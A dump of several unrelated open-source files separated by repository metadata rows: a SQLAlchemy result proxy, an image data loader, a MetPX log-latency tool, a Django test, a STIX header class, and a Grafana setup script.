On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`.ResultProxy.rowcount` is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`.ResultProxy.rowcount` may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`.ResultProxy.supports_sane_rowcount` and
:meth:`.ResultProxy.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
"""
try:
return self.context.rowcount
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None, self.cursor, self.context)
@property
def lastrowid(self):
"""return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
where it is appropriate. It's behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~ResultProxy.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self._saved_cursor.lastrowid
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self._saved_cursor, self.context)
@property
def returns_rows(self):
"""True if this :class:`.ResultProxy` returns rows.
I.e. if it is legal to call the methods
:meth:`~.ResultProxy.fetchone`,
:meth:`~.ResultProxy.fetchmany`
:meth:`~.ResultProxy.fetchall`.
"""
return self._metadata is not None
@property
def is_insert(self):
"""True if this :class:`.ResultProxy` is the result
of a executing an expression language compiled
:func:`.expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _cursor_description(self):
"""May be overridden by subclasses."""
return self._saved_cursor.description
def close(self, _autoclose_connection=True):
"""Close this ResultProxy.
Closes the underlying DBAPI cursor corresponding to the execution.
Note that any data cached within this ResultProxy is still available.
For some types of results, this may include buffered rows.
If this ResultProxy was generated from an implicit execution,
the underlying Connection will also be closed (returns the
underlying DBAPI connection to the connection pool.)
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
"""
if not self.closed:
self.closed = True
self.connection._safe_close_cursor(self.cursor)
if _autoclose_connection and \
self.connection.should_close_with_result:
self.connection.close()
# allow consistent errors
self.cursor = None
def __iter__(self):
while True:
row = self.fetchone()
if row is None:
raise StopIteration
else:
yield row
@util.memoized_property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a list of scalar values
corresponding to the list of primary key columns
in the target table.
This only applies to single row :func:`.insert`
constructs which did not explicitly specify
:meth:`.Insert.returning`.
Note that primary key columns which specify a
server_default clause,
or otherwise do not qualify as "autoincrement"
columns (see the notes at :class:`.Column`), and were
generated using the database-side default, will
appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed
with the "implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used.")
return self.context.inserted_primary_key
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.RowProxy`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
return self.context.returned_defaults
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
def _fetchone_impl(self):
try:
return self.cursor.fetchone()
except AttributeError:
self._non_result()
def _fetchmany_impl(self, size=None):
try:
if size is None:
return self.cursor.fetchmany()
else:
return self.cursor.fetchmany(size)
except AttributeError:
self._non_result()
def _fetchall_impl(self):
try:
return self.cursor.fetchall()
except AttributeError:
self._non_result()
def _non_result(self):
if self._metadata is None:
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically.",
)
else:
raise exc.ResourceClosedError("This result object is closed.")
def process_rows(self, rows):
process_row = self._process_row
metadata = self._metadata
keymap = metadata._keymap
processors = metadata._processors
if self._echo:
log = self.context.engine.logger.debug
l = []
for row in rows:
log("Row %r", row)
l.append(process_row(metadata, row, processors, keymap))
return l
else:
return [process_row(metadata, row, processors, keymap)
for row in rows]
def fetchall(self):
"""Fetch all rows, just like DB-API ``cursor.fetchall()``."""
try:
l = self.process_rows(self._fetchall_impl())
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchmany(self, size=None):
"""Fetch many rows, just like DB-API
``cursor.fetchmany(size=cursor.arraysize)``.
If rows are present, the cursor remains open after this is called.
Else the cursor is automatically closed and an empty list is returned.
"""
try:
l = self.process_rows(self._fetchmany_impl(size))
if len(l) == 0:
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchone(self):
"""Fetch one row, just like DB-API ``cursor.fetchone()``.
If a row is present, the cursor remains open after this is called.
Else the cursor is automatically closed and None is returned.
"""
try:
row = self._fetchone_impl()
if row is not None:
return self.process_rows([row])[0]
else:
self.close()
return None
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def first(self):
"""Fetch the first row and then close the result set unconditionally.
Returns None if no row is present.
"""
if self._metadata is None:
self._non_result()
try:
row = self._fetchone_impl()
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
try:
if row is not None:
return self.process_rows([row])[0]
else:
return None
finally:
self.close()
def scalar(self):
"""Fetch the first column of the first row, and close the result set.
Returns None if no row is present.
"""
row = self.first()
if row is not None:
return row[0]
else:
return None
class BufferedRowResultProxy(ResultProxy):
"""A ResultProxy with row buffering behavior.
``ResultProxy`` that buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
The pre-fetching behavior fetches only one row initially, and then
grows its buffer size by a fixed amount with each successive need
for additional rows up to a size of 100.
"""
def _init_metadata(self):
self.__buffer_rows()
super(BufferedRowResultProxy, self)._init_metadata()
# this is a "growth chart" for the buffering of rows.
# each successive __buffer_rows call will use the next
# value in the list for the buffer size until the max
# is reached
size_growth = {
1: 5,
5: 10,
10: 20,
20: 50,
50: 100,
100: 250,
250: 500,
500: 1000
}
def __buffer_rows(self):
size = getattr(self, '_bufsize', 1)
self.__rowbuffer = collections.deque(self.cursor.fetchmany(size))
self._bufsize = self.size_growth.get(size, size)
def _fetchone_impl(self):
if self.closed:
return None
if not self.__rowbuffer:
self.__buffer_rows()
if not self.__rowbuffer:
return None
return self.__rowbuffer.popleft()
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
self.__rowbuffer.extend(self.cursor.fetchall())
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class FullyBufferedResultProxy(ResultProxy):
"""A result proxy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
after the database conversation can not be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
def _init_metadata(self):
super(FullyBufferedResultProxy, self)._init_metadata()
self.__rowbuffer = self._buffer_rows()
def _buffer_rows(self):
return collections.deque(self.cursor.fetchall())
def _fetchone_impl(self):
if self.__rowbuffer:
return self.__rowbuffer.popleft()
else:
return None
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class BufferedColumnRow(RowProxy):
def __init__(self, parent, row, processors, keymap):
# preprocess row
row = list(row)
# this is a tad faster than using enumerate
index = 0
for processor in parent._orig_processors:
if processor is not None:
row[index] = processor(row[index])
index += 1
row = tuple(row)
super(BufferedColumnRow, self).__init__(parent, row,
processors, keymap)
class BufferedColumnResultProxy(ResultProxy):
"""A ResultProxy with column buffering behavior.
``ResultProxy`` that loads all columns into memory each time
fetchone() is called. If fetchmany() or fetchall() are called,
the full grid of results is fetched. This is to operate with
databases where result rows contain "live" results that fall out
of scope unless explicitly fetched. Currently this includes
cx_Oracle LOB objects.
"""
_process_row = BufferedColumnRow
def _init_metadata(self):
super(BufferedColumnResultProxy, self)._init_metadata()
metadata = self._metadata
# orig_processors will be used to preprocess each row when they are
# constructed.
metadata._orig_processors = metadata._processors
# replace the all type processors by None processors.
metadata._processors = [None for _ in range(len(metadata.keys))]
keymap = {}
for k, (func, obj, index) in metadata._keymap.items():
keymap[k] = (None, obj, index)
self._metadata._keymap = keymap
def fetchall(self):
# can't call cursor.fetchall(), since rows must be
# fully processed before requesting more from the DBAPI.
l = []
while True:
row = self.fetchone()
if row is None:
break
l.append(row)
return l
def fetchmany(self, size=None):
# can't call cursor.fetchmany(), since rows must be
# fully processed before requesting more from the DBAPI.
if size is None:
return self.fetchall()
l = []
for i in range(size):
row = self.fetchone()
if row is None:
break
l.append(row)
return l
|
mit
| 7,757,144,335,151,465,000
| 33.582133
| 84
| 0.566028
| false
| 4.828974
| false
| false
| false
|
atitus5/MiniPlaces
|
DataLoader_multi.py
|
1
|
9187
|
import os
import numpy as np
import scipy.misc
import h5py
import random
np.random.seed(123)
# loading data from .h5
class DataLoaderH5(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
# read data info from lists
f = h5py.File(kwargs['data_h5'], "r")
self.im_set = np.array(f['images'])
self.lab_set = np.array(f['labels'])
self.num = self.im_set.shape[0]
assert self.im_set.shape[0]==self.lab_set.shape[0], '#images and #labels do not match!'
assert self.im_set.shape[2]==self.load_size, 'Image size error!'
assert self.im_set.shape[1]==self.load_size, 'Image size error!'
print('# Images found:', self.num)
print("Shuffling...")
if self.randomize:
self.shuffle()
self._idx = 0
print("DataLoader ready.")
def next_batch_all(self, batch_size):
labels_batch = np.zeros(batch_size*9)
images_batch = np.zeros((batch_size*9, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_batch[9*i+loc_i, ...] = image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[9*i+loc_i, ...] = self.lab_set[self._idx]
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_batch[3+9*i+loc_i, ...] = image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[3+9*i+loc_i, ...] = self.lab_set[self._idx]
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_batch[6+9*i+loc_i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[6+9*i+loc_i, ...] = self.lab_set[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def next_batch_sample(self, batch_size):
labels_batch = np.zeros(batch_size)
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
images_labels = []
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_labels.append((image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_labels.append((image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_labels.append((image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
choice = random.choice(images_labels)
images_batch[i, ...] = choice[0]
labels_batch[i, ...] = choice[1]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
def shuffle(self):
perm = np.random.permutation(self.num)
self.im_set = self.im_set[perm]
self.lab_set = self.lab_set[perm]
# Loading data from disk
class DataLoaderDisk(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
self.data_root = os.path.join(kwargs['data_root'])
# read data info from lists
self.list_im = []
self.list_lab = []
with open(kwargs['data_list'], 'r') as f:
for line in f:
path, lab =line.rstrip().split(' ')
self.list_im.append(os.path.join(self.data_root, path))
self.list_lab.append(int(lab))
self.list_im = np.array(self.list_im, np.object)
self.list_lab = np.array(self.list_lab, np.int64)
self.num = self.list_im.shape[0]
print('# Images found:', self.num)
# permutation
perm = np.random.permutation(self.num)
self.list_im[:, ...] = self.list_im[perm, ...]
self.list_lab[:] = self.list_lab[perm, ...]
self._idx = 0
def next_batch(self, batch_size):
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
labels_batch = np.zeros(batch_size)
for i in range(batch_size):
image = scipy.misc.imread(self.list_im[self._idx])
image = scipy.misc.imresize(image, (self.load_size, self.load_size))
image = image.astype(np.float32)/255.
image = image - self.data_mean
if self.randomize:
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, self.load_size-self.fine_size)
offset_w = np.random.random_integers(0, self.load_size-self.fine_size)
else:
offset_h = (self.load_size-self.fine_size)//2
offset_w = (self.load_size-self.fine_size)//2
images_batch[i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[i, ...] = self.list_lab[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
|
mit
| 7,697,863,647,594,161,000
| 40.949772
| 142
| 0.534669
| false
| 3.411437
| false
| false
| false
|
khosrow/metpx
|
sundew/lib/PDSLatencies.py
|
1
|
7398
|
#!/usr/bin/env python
"""
MetPX Copyright (C) 2004-2006 Environment Canada
MetPX comes with ABSOLUTELY NO WARRANTY; For details type see the file
named COPYING in the root of the source directory tree.
"""
"""
#############################################################################################
# Name: PDSLatencies
#
# Author: Daniel Lemay
#
# Date: 2005-09-13
#
# Description: Calculate latencies for a product (MPCN for example) sent to
# a PDS client (wxo-b1 for example)
#
#############################################################################################
"""
import sys, os, os.path, commands, fnmatch
import PXPaths, dateLib
from Latencies import Latencies
class PDSLatencies(Latencies):
def __init__(self, nopull=False, keep=False, date=None, pattern='ACC', machines=['pds1', 'pds2', 'pds3', 'pds4'], sources=['pdschkprod'], client='wxo-b1-oper-ww', xstats=False):
Latencies.__init__(self, nopull, keep, date, xstats) # Parent Constructor
self.pattern = pattern # Products that we want to match
self.machines = machines # Machines were the logs can be found
self.sources = sources # Sources for which we will check arrival time of the products
self.client = client # Client for which we will check delivery time of the products (ONLY ONE ENTRY in the list)
self.system = 'PDS'
if not self.nopull:
self.obtainFiles()
self.start()
if not self.keep:
self.eraseFiles()
def obtainFiles(self):
date = self.date
# Used for xferlog
(dummy, month, day) = dateLib.getISODateParts(date)
if day[0] == '0':
day = ' ' + day[1]
monthAbbrev = dateLib.getMonthAbbrev(month)
LOG = '/apps/pds/log/'
for machine in self.machines:
self.manager.createDir(PXPaths.LAT_TMP + machine + '_' + self.random)
for source in self.sources:
command = 'scp -q %s:%s %s' % (machine, LOG + source + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
command = 'scp -q %s:%s %s' % (machine, LOG + self.client + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
# xferlog data
if self.xstats:
command = "ssh %s grep -h -e \"'%s %s'\" /var/log/xferlog /var/log/xferlog.?" % (machine, monthAbbrev, day)
(status, output) = commands.getstatusoutput(command)
xferlog = open(PXPaths.LAT_TMP + machine + '_' + self.random + '/xferlog_paplat', 'w')
xferlog.write(output)
xferlog.close()
def extractGoodLines(self, prefix, good):
date = self.date
for machine in self.machines:
hostOnly = machine.split('.')[0]
lines = []
xferlogLines = []
dirPath = PXPaths.LAT_TMP + machine + '_' + self.random
try:
files = os.listdir(dirPath)
except OSError:
print "%s doesn't exist!\nDon't use -n|--nopull option if you don't have some data." % dirPath
sys.exit(1)
if prefix == 'rx':
for file in [x for x in files if x == 'pdschkprod.%s' % (date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.xstats:
for file in [x for x in files if x == 'xferlog_paplat']:
xferlogLines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*')))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), xferlogLines))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*%s*' % (self.pattern))))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), fnmatch.filter(xferlogLines, '*%s*' % (self.pattern))))
if prefix == 'tx':
for file in [x for x in files if x == '%s.%s' % (self.client, date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*sent to*')))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*%s*sent to*' % (self.pattern))))
def extractInfos(self, prefix, good, infos):
if prefix == 'rx':
#print("GOOD RX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918000030
filename_parts = os.path.split(parts[9])[1].split(':')
filename = ':'.join(filename_parts[:-2])
else:
filename = os.path.split(parts[9])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodRx = []
# xferlog stuff
for (line, machine) in self.goodXferlog:
parts = line.split()
hhmmss = parts[3]
date = '%s %s' % (self.dateDashed, hhmmss)
filename = os.path.split(parts[8])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
self.xferlogInfos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
self.goodXferlog = []
if prefix == 'tx':
#print("GOOD TX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918020123:pds4
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-3])
else:
# Only remove machine name
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-1])
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodTx = []
"""
print "*************************************** RX ********************************"
for tuple in self.goodRx:
print (tuple[0].strip(), tuple[1])
print "*************************************** TX ********************************"
for tuple in self.goodTx:
print (tuple[0].strip(), tuple[1])
"""
if __name__ == '__main__':
latencier = PDSLatencies()
|
gpl-2.0
| -795,901,474,159,940,700
| 42.011628
| 181
| 0.499594
| false
| 3.895735
| false
| false
| false
|
CodeYellowBV/django-binder
|
tests/test_set_nullable_relation.py
|
1
|
2202
|
from binder.exceptions import BinderValidationError
from binder.router import Router
from binder.views import ModelView
from .testapp.views import AnimalView
from .testapp.models import Animal, Caretaker
from django.test import TestCase
class TestSetNullableRelations(TestCase):
def test_standard_filling_in_relation_to_existing_model(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_filling_in_relation_to_existing_model_after_evaulation(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
assert animal.caretaker is None
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_setting_none_existing_caretaker_gives_validation_error(self):
animal = Animal.objects.create(name='foo', caretaker=Caretaker.objects.create(name='bar2'))
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal.caretaker
with self.assertRaises(BinderValidationError):
animal_view._store(animal, {'caretaker': -1}, FakeRequest())
|
mit
| 7,358,221,550,644,352,000
| 26.185185
| 99
| 0.624886
| false
| 3.890459
| true
| false
| false
|
STIXProject/python-stix
|
stix/core/stix_header.py
|
1
|
5004
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import fields
import stix
from stix.utils import deprecated
from stix.common import InformationSource, StructuredTextList, Profiles
from stix.common.vocabs import VocabField, PackageIntent
from stix.data_marking import Marking
import stix.bindings.stix_core as stix_core_binding
class STIXHeader(stix.Entity):
"""The STIX Package Header.
Args:
handling: The data marking section of the Header.
information_source: The :class:`.InformationSource` section of the
Header.
package_intents: **DEPRECATED**. A collection of :class:`.VocabString`
defining the intent of the parent :class:`.STIXPackage`.
description: **DEPRECATED**. A description of the intent or purpose
of the parent :class:`.STIXPackage`.
short_description: **DEPRECATED**. A short description of the intent
or purpose of the parent :class:`.STIXPackage`.
title: **DEPRECATED**. The title of the :class:`.STIXPackage`.
Attributes:
profiles: A collection of STIX Profiles the parent
:class:`.STIXPackage` conforms to.
title: **DEPRECATED**. The title of the parent :class:`.STIXPackage`.
"""
_binding = stix_core_binding
_binding_class = _binding.STIXHeaderType
_namespace = 'http://stix.mitre.org/stix-1'
title = fields.TypedField("Title", preset_hook=deprecated.field)
package_intents = VocabField("Package_Intent", PackageIntent, multiple=True, preset_hook=deprecated.field)
descriptions = fields.TypedField("Description", type_=StructuredTextList, preset_hook=deprecated.field)
short_descriptions = fields.TypedField("Short_Description", type_=StructuredTextList, preset_hook=deprecated.field)
handling = fields.TypedField("Handling", Marking)
information_source = fields.TypedField("Information_Source", InformationSource)
profiles = fields.TypedField("Profiles", Profiles)
def __init__(self, package_intents=None, description=None, handling=None,
information_source=None, title=None, short_description=None):
super(STIXHeader, self).__init__()
self.package_intents = package_intents
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
self.handling = handling
self.information_source = information_source
self.profiles = None
@property
def description(self):
"""**DEPRECATED**. A single description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of
:class:`.StructuredText`
"""
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""**DEPRECATED**. Adds a description to the ``descriptions``
collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
deprecated.warn(description)
self.descriptions.add(description)
@property
def short_description(self):
"""**DEPRECATED**. A single short description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
self.short_descriptions = StructuredTextList(value)
def add_short_description(self, description):
"""**DEPRECATED**. Adds a description to the ``short_descriptions``
collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
deprecated.warn(description)
self.short_descriptions.add(description)
def add_package_intent(self, package_intent):
"""**DEPRECATED**. Adds :class:`.VocabString` object to the
:attr:`package_intents` collection.
If the input is not an instance of :class:`.VocabString`, an effort
will be made to convert it into an instance of :class:`.PackageIntent`.
"""
deprecated.warn(package_intent)
self.package_intents.append(package_intent)
def add_profile(self, profile):
"""Adds a profile to the STIX Header. A Profile is represented by a
string URI.
"""
self.profiles.append(profile)
|
bsd-3-clause
| 8,210,940,760,186,117,000
| 34.489362
| 119
| 0.666267
| false
| 4.381786
| false
| false
| false
|
moio/sumaform
|
salt/grafana/setup_grafana.py
|
1
|
1107
|
#!/usr/bin/env python
import base64
import errno
import httplib
import json
import socket
import sys
import time
def do(method, connection, headers, path, body=None):
connection.request(method, path, headers=headers, body=json.dumps(body))
resp = connection.getresponse()
content = resp.read()
if resp.status != 200:
raise IOError("Unexpected HTTP status received on %s: %d" % (path, resp.status))
return json.loads(content)
connection = httplib.HTTPConnection("localhost")
# try to connect, multiple times if ECONNREFUSED is raised
# (service is up but not ready for requests yet)
for retries in range(0,10):
try:
connection.connect()
except socket.error as e:
if e.errno != errno.ECONNREFUSED:
raise e
print("Connection refused, retrying...")
time.sleep(1)
token = base64.b64encode("admin:admin".encode("ASCII")).decode("ascii")
headers = {
"Authorization" : "Basic %s" % token,
"Content-Type" : "application/json; charset=utf8"
}
